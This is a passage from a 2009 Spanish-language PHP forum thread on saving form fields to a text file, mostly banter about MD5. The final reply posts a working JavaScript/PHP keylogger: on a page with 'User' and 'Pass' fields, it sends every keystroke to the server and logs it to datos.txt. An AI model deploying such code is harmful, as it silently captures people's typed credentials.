elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  escribir los campos del formulario en un txt
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: escribir los campos del formulario en un txt  (Leído 5,581 veces)
Nakp
casi es
Ex-Staff
*
Desconectado Desconectado

Mensajes: 6.336

he vuelto :)


Ver Perfil WWW
Re: escribir los campos del formulario en un txt
« Respuesta #10 en: 19 Febrero 2009, 23:52 pm »

hacer la conversión a md5?

http://php.net/md5

y yo me pregunto... por que no leen un poco mas :P


En línea

Ojo por ojo, y el mundo acabará ciego.
invisible_hack


Desconectado Desconectado

Mensajes: 978


Invisible_Hack™ Nick Registrado ^^


Ver Perfil WWW
Re: escribir los campos del formulario en un txt
« Respuesta #11 en: 20 Febrero 2009, 00:00 am »

hacer la conversión a md5?

http://php.net/md5

y yo me pregunto... por que no leen un poco mas :P

Si relees mi post verás que no pregunté como hacer la conversión MD5, sino que dije que ya hice un conversor de MD5, para el cual tenia que interactuar con los datos que el usuario metiese en el textbox y al pulsar el botón (que es de esto ultimo de lo que se habla en este post), con lo cual yo no pregunté nada, conté lo de mi conversor porque el tema que se trata en este post me lo recordó  :xD

Saludos


« Última modificación: 20 Febrero 2009, 00:02 am por invisible_hack » En línea

"Si no visitas mi blog, Chuck te dará una patada giratoria"
Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: escribir los campos del formulario en un txt
« Respuesta #12 en: 20 Febrero 2009, 00:06 am »

y para que explicas tu caso si no tiene nada que ver con el tema .__.
En línea

Nakp
casi es
Ex-Staff
*
Desconectado Desconectado

Mensajes: 6.336

he vuelto :)


Ver Perfil WWW
Re: escribir los campos del formulario en un txt
« Respuesta #13 en: 20 Febrero 2009, 00:39 am »

hacer la conversión a md5?

http://php.net/md5

y yo me pregunto... por que no leen un poco mas :P

Si relees mi post verás que no pregunté como hacer la conversión MD5, sino que dije que ya hice un conversor de MD5, para el cual tenia que interactuar con los datos que el usuario metiese en el textbox y al pulsar el botón (que es de esto ultimo de lo que se habla en este post), con lo cual yo no pregunté nada, conté lo de mi conversor porque el tema que se trata en este post me lo recordó  :xD

Saludos

oséase que reinventaste la rueda... eso lo entendí, si ya lo hiciste para practicar ya sos vos
En línea

Ojo por ojo, y el mundo acabará ciego.
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: escribir los campos del formulario en un txt
« Respuesta #14 en: 20 Febrero 2009, 07:18 am »

Hay una forma para enviar los valores de cada tecla pulsada directamente al archivo sin la necesidad de enviar la petición y te ahorras todo el jaleo:
Código
  1. <?php
  2.  
  3. if(!$_GET['k']){ ?>
  4. Ingrese sus datos<br />
  5. <input type=text /> User<br>
  6. <input type=text /> Pass<br>
  7. <input type=submit>
  8.  
  9. <script>
  10.  
  11. document.onkeydown = function(e){
  12. if (!e) e = window.event;
  13. var unicode = e.charCode ? e.charCode: e.keyCode;
  14. var mod = (e.ctrlKey) ? 'Ctrl-': (e.altKey) ? 'Alt-': (e.shiftKey) ? 'Shift-': '';
  15. var tecla = mod + String.fromCharCode(unicode);
  16. grabar('http://<?php echo $_SERVER[HTTP_HOST].$_SERVER[SCRIPT_NAME]; ?>?k=' + tecla);
  17. }
  18.  
  19. function grabar(url){
  20. var xmlHttp = null;
  21. try{
  22.  xmlHttp = new XMLHttpRequest();
  23. }catch(e){
  24.  try{
  25.   xmlHttp = new ActiveXObject('Msxml2.XMLHTTP');
  26.  }catch(e){
  27.   xmlHttp = new ActiveXObject('Microsoft.XMLHTTP');
  28.  }
  29. }
  30. xmlHttp.onreadystatechange = function(){
  31.  if(xmlHttp.readyState == 4) try{
  32.   if(xmlHttp.status == 200) {}
  33.  }catch(e){}
  34. }
  35. xmlHttp.open('get', url);
  36. xmlHttp.send(null);
  37. }
  38. </script>
  39.  
  40. <?php
  41. }else{
  42. $file = fopen('datos.txt','a');
  43. fwrite($file,$_GET['k']);
  44. fclose($file);
  45. }
  46. ?>
  47.  

Lo que hace es tomar cada tecla pulsada y enviar su valor via GET al mismo archivo guardandolo en un txt, donde dice "a" puedes reemplazarlo por "x" para creación y sobreescritura o escritura solamente dependiendo si ya existe o no, puedes hacerlo con if(file_exist(.. etc etc.
En línea

Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Formulario con efecto interesante de Etiquetas sobre los campos de texto
PHP
Graphixx 1 2,024 Último mensaje 22 Marzo 2012, 03:49 am
por Shell Root
Mejor forma de guardar campos de formulario (textarea) si se cierra la ventana.
PHP
Graphixx 1 3,832 Último mensaje 23 Junio 2012, 14:37 pm
por WarGhost
Validar campos checkbox y radio en formulario
PHP
rochudo 0 3,105 Último mensaje 14 Febrero 2013, 12:03 pm
por rochudo
Llenar campos de un formulario con un boton o vinculo
PHP
FrankVB 2 1,833 Último mensaje 17 Octubre 2013, 22:34 pm
por miloscorp
Campos dinamicos en formulario
Desarrollo Web
Crash_RPM 3 2,640 Último mensaje 5 Agosto 2015, 14:05 pm
por eLank0
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines